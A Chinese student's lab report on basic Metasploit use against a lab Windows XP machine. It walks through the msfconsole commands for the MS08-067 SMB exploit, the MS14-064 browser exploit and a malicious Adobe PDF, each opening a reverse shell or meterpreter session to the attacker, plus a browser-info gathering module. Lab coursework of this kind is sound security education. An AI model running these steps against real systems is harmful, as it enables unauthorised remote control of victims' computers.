20154331 Exp5 MSF基础应用
实验内容:
1、主动攻击:ms08_067。
首先我们用 search ms08-067查看漏洞信息。
我们发现就只有一个工具,于是乎调用它,使用 use exploit/windows/smb/ms08_067_netapi.
然后键入show payloads
看一下我们需要的payload
然后我们输入set payload generic/shell_reverse_tcp
选择病毒模块。然后show option 查看相应的信息。
然后我们设置相应的参数,LHOST是主机,RHOST是靶机。
主机ip为192.168.116.131
靶机ip为192.168.116.134
回连成功了!
然后我尝试是在主机下与自己ping,结果能ping通,主动攻击成功!!!
2、针对浏览器的攻击,ms14-064.
首先在微软的官网上上到14-064以及了解相关信息。决定用这个。
在msf中search ms14-064, 看到三个工具。
然后我们选择用第一个模块:use exploit/windows/browser/ms14_064_ole_code_execution.
并反向链接:payload windows/meterpreter/reverse_tcp。
然后输入:show options配置一下参数。
由于这个实验是第二天做的,主机的ip地址又变成了192.168.116.135.我们来配置一下参数:
AllowPowershellprompt改为true:set AllowPowershellPrompt true
LHOST---攻击机的IP地址:set LHOST 192.168.116.135
SRVHOST---攻击机的IP地址:set SRVHOST 192.168.116.135
exploit.
exploit攻击后会生成带有攻击性的URL,这里生成的URL为:http://192.168.0.203:8080/fuiYPGD3cKdbp,
URL发到winxp上用winxp的ie浏览器打开:
回到msf,我们可以看到有攻击绘画的建立,得到一个session 2,(1是我之前一次建立的,不用管他)利用这个绘画便得到了meterpreter,输入指令获取winxp的信息
攻击成功!!!!
攻击成功!!!
3、针对客户端的攻击:adobe
首先和之前一样用search命令查找对该漏洞的攻击模块:search adobe
我选取的是下面蓝框的:use exploit/windows/fileformat/adobe_pdf_embedded_exe.
然后查看需要的设置和可以攻击的靶机类型:
输入:show options
然后exploit生成:
输入:use exploit/multi/handler 进入handler模式,然后exploit
我们输入抓屏指令:screenshot试试
成功了!!!!
4、成功应用任何一个辅助模块。
用show auxiliary
查看所有辅助模块,并选择其中的一个,选的是 gather/browser_info
然后输入 :show options查看需要修改的信息:
修改主机IP地址:set SRVHOST 192.168.116.135
生成一个usl,我们把这个网址复制到winxp靶机上用浏览器打开:
上钩了:
基础问题回答:
(1)用自己的话解释什么是exploit,payload,encode.
exploit是生成或启动已经设置好的攻击程序,获得相应权限。在实验中,exploit生成了PDF文件来将被攻击主机的shell传送给在监听的Kali;生成了一个网站服务器,被攻击者连接时可被攻击;直接攻击win7主机等。
payload是指将恶意代码包装成可插入到目标主机的东西。
encode是指编码,去掉一些无用的字符或改变自己的特征码。
实验体会:
这是第五次实验MSF基础应用,这次争对具体主机进行攻击,原来漏洞那么多,看来还是要及时修补漏洞才是真的,什么网络链接之类的都不敢再点了,哈哈哈,不过还是收获很多的。